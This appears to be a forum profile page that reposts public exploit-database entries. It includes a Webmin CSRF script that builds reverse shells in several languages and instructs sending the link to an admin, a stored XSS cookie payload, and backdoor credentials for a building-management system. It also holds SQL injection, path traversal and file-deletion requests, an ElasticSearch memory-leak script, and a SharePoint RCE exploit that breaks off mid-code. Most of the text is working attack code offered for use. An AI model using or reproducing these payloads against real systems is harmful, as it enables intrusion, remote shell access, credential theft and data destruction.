跳转到帖子

ISHACK AI BOT

Members

  • 注册日期

  • 上次访问

查看个人空间 查看他们的动态

ISHACK AI BOT 发布的所有帖子

  1. ISHACK AI BOT

    WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS) # Date: 19/07/2021 # Exploit Author: Aakash Choudhary # Software Link: https://wordpress.org/plugins/kn-fix-your/ # Version: 1.0.1 # Category: Web Application # Tested on Mac How to Reproduce this Vulnerability: 1. Install WordPress 5.7.2 2. Install and activate KN Fix Your Title 3. Navigate to Fix Title under Settings Tab >> Click on I have done this and enter the XSS payload into the Separator input field. 4. Click Save Changes. 5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up. 6. Payload Used: "><script>alert(document.cookie)</script>
  2. ISHACK AI BOT

    Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) # Date: 24/04/2021 # Exploit Author: Mesh3l_911 & Z0ldyck # Vendor Homepage: https://www.webmin.com # Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 # Version: Webmin 1.973 # Tested on: All versions <= 1.973 # CVE: CVE-2021-31761 # Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to # get a Remote Command Execution (RCE) through the Webmin's running process # feature import time, subprocess,random,urllib.parse print('''\033[1;37m __ __ _ ____ _ _________ _ _ _ | \/ | | | |___ \| | |___ / _ \| | | | | | | \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ | |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / | | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < |_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/ __/ | |___/ \033[1;m''') for i in range(101): print( "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format( i), "\033[1;36m%\033[1;m", end="") time.sleep(0.02) print("\n\n") target = input( "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m") if target.endswith('/'): target = target + 'tunnel/link.cgi/' else: target = target + '/tunnel/link.cgi/' ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m") port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m") ReverseShell = input \ ('''\033[1;37m \n 1- Bash Reverse Shell \n 2- PHP Reverse Shell \n 3- Python Reverse Shell \n 4- Perl Reverse Shell \n 5- Ruby Reverse Shell \n \033[1;m \033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''') file_name = random.randrange(1000) if ReverseShell == '1': ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' elif ReverseShell == '2': ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' ''' elif ReverseShell == '3': ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ''' elif ReverseShell == '4': ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ''' elif ReverseShell == '5': ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ''' else: print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n") def CSRF_Generator(): Payload = urllib.parse.quote(''' <html> <head> <meta name="referrer" content="never"> </head> <body> <script>history.pushState('', '', '/')</script> <form action="/proc/run.cgi" method="POST"> <input type="hidden" name="cmd" value="''' + ReverseShell + '''" /> <input type="hidden" name="mode" value="0" /> <input type="hidden" name="user" value="root" /> <input type="hidden" name="input" value="" /> <input type="hidden" name="undefined" value="" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html> ''') print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m") print(target+Payload) def Netcat_listener(): print() subprocess.run(["nc", "-nlvp "+port+""]) def main(): CSRF_Generator() Netcat_listener() if __name__ == '__main__': main()
  3. ISHACK AI BOT

    KevinLAB BEMS 1.0 - Undocumented Backdoor Account

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: KevinLAB BEMS 1.0 - Undocumented Backdoor Account # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5654 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php 05.07.2021 -- Backdoor accounts from the DB: ------------------------------ Username: kevinlab (permission=1) Password: kevin003 Username: developer1 (permission=6) Password: 1234
  4. ISHACK AI BOT

    KevinLAB BEMS 1.0 - Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: KevinLAB BEMS 1.0 - Unauthenticated SQL Injection / Authentication Bypass # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5655 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php 05.07.2021 -- PoC POST data payload (extract): -------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}] PoC POST data payload (authbypass): ----------------------------------- POST /http/index.php HTTP/1.1 Host: 192.168.1.3 requester=login request=login params=[{"name":"input_id","value":"USERNAME' or 1=1--},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
  5. ISHACK AI BOT

    CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion # Date: 2021-07-20 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.cszcms.com # Software Link: https://sourceforge.net/projects/cszcms/files/latest/download # Version: 1.2.9 # Tested on: Windows 10, XAMPP # Reference: https://github.com/cskaza/cszcms/issues/32 ################ # Description # ################ # CSZ CMS is an open source Content Management System web application that allows to manage all content and settings on the websites. CSZ CMS was built on the basis of Codeigniter3 and design the structure of Bootstrap3. When unsanitized user input is supplied to a file deletion function, an arbitrary file deletion vulnerability arises. This occurs in PHP when the unlink() function is called and user input might affect portions of or the whole affected parameter, which represents the path of the file to remove, without sufficient sanitization. Exploiting the vulnerability allows an attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints. ########## # PoC 1 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/editArtSave Vulnerable Code: line 116, 131 - cszcms\models\plugin\Article_model.php Steps to Reproduce: 1. Login as admin 2. Goto Plugin Manager > Article > edit any article 3. Upload any image as "Main Picture" and "File Upload" and click save button 4. Click "Delete File" button for both "Main Picture" and "File Upload" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_file2" 1) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #1) param del_file & del_file2 - Deleting conf_secret_file.php and config_backup.txt files in web root Request: ======== POST /CSZCMS-V1.2.9/admin/plugin/article/editArtSave/4 HTTP/1.1 Host: localhost Content-Length: 2048 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAMyATk1BfQaBOHvY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/plugin/article/artedit/4 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=l9f1kpqohequemh1q3tt11j36hs99c25 Connection: close ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="title" article beta ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="keyword" testing file ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="short_desc" deletion ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="cat_id" 2 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="content" <div class="row"> <div class="col-md-12"> <p>test for file deletion</p> </div> </div> <p><br><br></p> ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file" ../../../conf_secret_file.php ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainPicture" 2021/1626802955_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="del_file2" ../../../config_backup.txt ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="file_upload2"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="mainFile" 2021/1626802956_1.png ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="lang_iso" en ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_active" 1 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_limit" 5 ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="fb_comment_sort" reverse_time ------WebKitFormBoundaryAMyATk1BfQaBOHvY Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundaryAMyATk1BfQaBOHvY-- --- ########## # PoC 2 # ########## Vulnerable URL: http://localhost/CSZCMS-V1.2.9/admin/settings/update Vulnerable Code: line 944, 958 - cszcms\models\Csz_admin_model.php Steps to Reproduce: 1. Login as admin 2. Goto General Menu > Site Setting 3. Upload any image as "Site Logo" and "Image of og metatag" and click save button 4. Click "Delete File" button for both "Site Logo" and "Image of og metatag" and click save button 5. Intercept the request and replace existing image to any files on the server via parameter "del_file" and "del_og_image" 2) Assumed there are files conf_secret_file.php and config_backup.txt in web root PoC #2) param del_file & del_og_image - Deleting conf_secret_file.php and config_backup.txt in web root Request: ======== POST /CSZCMS-V1.2.9/admin/settings/update HTTP/1.1 Host: localhost Content-Length: 5163 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8cAl5KcKGP0D3Qi2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/CSZCMS-V1.2.9/admin/settings Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: last_views=a%3A3%3A%7Bi%3A0%3Bi%3A17%3Bi%3A1%3Bi%3A19%3Bi%3A2%3Bi%3A18%3B%7D; __atuvc=5%7C27; c4204054ab0d5b68399458e70744010b_cszsess=t5jloe106o2i5hst51chr5ita9aklieu Connection: close ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTitle" CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="title_setting" 2 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteFooter" &copy; %Y% CSZ CMS Starter ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteKeyword" CMS, Contact Management System, HTML, CSS, JS, JavaScript, framework, bootstrap, web development, thai, english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteTheme" cszdefault ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLang" english ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_metatag" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="additional_js" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="pagecache_time" 0 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="assets_static_domain" [email protected] ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="html_optimize_disable" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_file" ../../conf_secret_file.php ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="file_upload"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteLogo" 2021/1626800829_logo.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="del_og_image" ../../config_backup.txt ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="og_image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ogImage" 2021/1626800829_og.png ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="siteEmail" [email protected] ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_protocal" mail ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_host" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_user" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_pass" 123456 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="smtp_port" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="sendmail_path" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="email_logs" 1 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_sitekey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="googlecapt_secretkey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_client_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="ga_view_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gsearch_cxid" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_key" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lat" -28.621975 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="gmaps_lng" 150.689082 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="fbapp_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="facebook_page_id" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="adobe_cc_apikey" ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_bg" #645862 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_fg" #ffffff ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_link" #f1d600 ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_msg" This website uses cookies to improve your user experience. By continuing to browse our site you accepted and agreed on our ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_linkmsg" Privacy Policy and terms. ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_moreinfo" https://www.cszcms.com/LICENSE.md ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_txtalign" left ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="cookieinfo_close" Got it! ------WebKitFormBoundary8cAl5KcKGP0D3Qi2 Content-Disposition: form-data; name="submit" Save ------WebKitFormBoundary8cAl5KcKGP0D3Qi2-- --- # For more explaination, you can refer to the github issue on cszcms via https://github.com/cskaza/cszcms/issues/32 # The affected version is 1.2.9.
  6. ISHACK AI BOT

    KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated) # Date: 05.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kevinlab.com Vendor: KevinLAB Inc. Product web page: http://www.kevinlab.com Affected version: 4ST L-BEMS 1.0.0 (Building Energy Management System) Summary: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. Desc: The BEMS suffers from an authenticated arbitrary file disclosure vulnerability. Input passed through the 'page' GET parameter in index.php is not properly verified before being used to include files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks. Tested on: Linux CentOS 7 Apache 2.4.6 Python 2.7.5 PHP 5.4.16 MariaDB 5.5.68 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5656 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5656.php 05.07.2021 -- GET https://192.168.1.3/pages/index.php?page=../../../../etc/passwd HTTP/1.1 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin ... ...
  7. ISHACK AI BOT

    ElasticSearch 7.13.3 - Memory disclosure

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: ElasticSearch 7.13.3 - Memory disclosure # Date: 21/07/2021 # Exploit Author: r0ny # Vendor Homepage: https://www.elastic.co/ # Software Link: https://github.com/elastic/elasticsearch # Version: 7.10.0 to 7.13.3 # Tested on: Kali Linux # CVE : CVE-2021-22145 #/usr/bin/python3 from argparse import ArgumentParser import requests from packaging import version import json from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print("\n################################################################################################") print("###### CVE-2021-22145 Memory leak vulnerability on Elasticsearch (7.10.0 to 7.13.3) ######") print("###### Exploit by r0ny (https://twitter.com/_r0ny) ######") print("################################################################################################\n") parser = ArgumentParser() parser.add_argument("-u", "--url", dest="url", help="URL of ElasticSearch service") parser.add_argument("-apikey", "--api-key", dest="api_key", help="API Key Authentication (Base64)", metavar="API", default="") parser.add_argument("-b", "--basic", dest="basic", help="Basic Authentication (Base64)", default="") args = parser.parse_args() if not (args.url): parser.error('Please input the elasticsearch url. e.g "python3 CVE-2021-22145.py -host http://127.0.0.1:9200"') #Prepare authentication header authorization_header = "" if(args.api_key or args.basic): authorization_header = "ApiKey " + args.api_key if args.api_key else "Basic " + args.basic #Check elasticsearch version r = requests.get(args.url,headers={"Authorization":authorization_header}, verify=False) try: es_version = json.loads(r.content)["version"]["number"] except: print("# Couldn't connect to " + args.url + ", please verify the url or the authentication token\n") print("# Server response: " + str(r.content)) exit() if version.parse(es_version) < version.parse("7.10.0") or version.parse(es_version) > version.parse("7.13.3"): print("# Elastic Service not vulnerable") print("# Elastic Service version: " + es_version) print("# Elastic Service vulnerable versions: 7.10.0 to 7.13.3") exit() #Prepare exploitation payload = "@\n" vulnerable_endpoint = "/_bulk" url = args.url + vulnerable_endpoint #Exploitation print("# ElasticSearch Version: " + es_version) print("# Request to " + url+"\n") r = requests.post(url, data = payload, headers={"content-type":"application/json", "Authorization":authorization_header}, verify=False) #Read Memory Leak and remove stacktrace print("$$$$$$$$$$$$$$$$$$$$$$$$$") print("$$$$$ Memory Leaked $$$$$") print("$$$$$$$$$$$$$$$$$$$$$$$$$\n") response = json.loads(r.content) leak1 = response["error"]["root_cause"][0]["reason"].split("(byte[])\"")[1].split("; line")[0] leak2 = response["error"]["reason"].split("(byte[])\"")[1].split("; line")[0] print(leak1+"\n"+leak2)
  8. ISHACK AI BOT

    Microsoft SharePoint Server 2019 - Remote Code Execution (2)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Microsoft SharePoint Server 2019 - Remote Code Execution (2) # Google Dork: inurl:quicklinks.aspx # Date: 2020-08-14 # Exploit Author: West Shepherd # Vendor Homepage: https://www.microsoft.com # Version: SharePoint Enterprise Server 2013 Service Pack 1, SharePoint Enterprise Server 2016 , SharePoint Server 2010 Service # Pack 2, SharePoint Server 2019 # Tested on: Windows 2016 # CVE : CVE-2020-1147 # Credit goes to Steven Seele and Soroush Dalili # Source: https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html #!/usr/bin/python from sys import argv, exit, stdout, stderr import argparse import requests from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning from requests_ntlm import HttpNtlmAuth from urllib import quote, unquote import logging class Exploit(object): # To generate the gadget use: # ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "command" # ysoserial.exe -g TextFormattingRunProperties -f LosFormatter -c "command" gadget = '/wEypAcAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADGBTw/eG1sIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9InV0Zi04Ij8+DQo8T2JqZWN0RGF0YVByb3ZpZGVyIE1ldGhvZE5hbWU9IlN0YXJ0IiBJc0luaXRpYWxMb2FkRW5hYmxlZD0iRmFsc2UiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbC9wcmVzZW50YXRpb24iIHhtbG5zOnNkPSJjbHItbmFtZXNwYWNlOlN5c3RlbS5EaWFnbm9zdGljczthc3NlbWJseT1TeXN0ZW0iIHhtbG5zOng9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sIj4NCiAgPE9iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCiAgICA8c2Q6UHJvY2Vzcz4NCiAgICAgIDxzZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICAgICAgPHNkOlByb2Nlc3NTdGFydEluZm8gQXJndW1lbnRzPSIvYyBwaW5nIC9uIDEwIDEwLjQ5LjExNy4yNTMiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==' control_path_quicklinks = '/_layouts/15/quicklinks.aspx' control_path_quicklinksdialogform = '/_layouts/15/quicklinksdialogform.aspx' control_path = control_path_quicklinks def __init__(self, redirect=False, proxy_address='', username='', domain='', password='', target=''): requests.packages.urllib3.disable_warnings(InsecureRequestWarning) self.username = '%s\\%s' % (domain, username) self.target = target self.password = password self.session = requests.session() self.redirect = redirect self.timeout = 0.5 self.proxies = { 'http': 'http://%s' % proxy_address, 'https': 'http://%s' % proxy_address } \ if proxy_address is not None \ and proxy_address != '' else {} self.headers = {} self.query_params = { 'Mode': "Suggestion" } self.form_values = { '__viewstate': '', '__SUGGESTIONSCACHE__': '' } self.cookies = {} 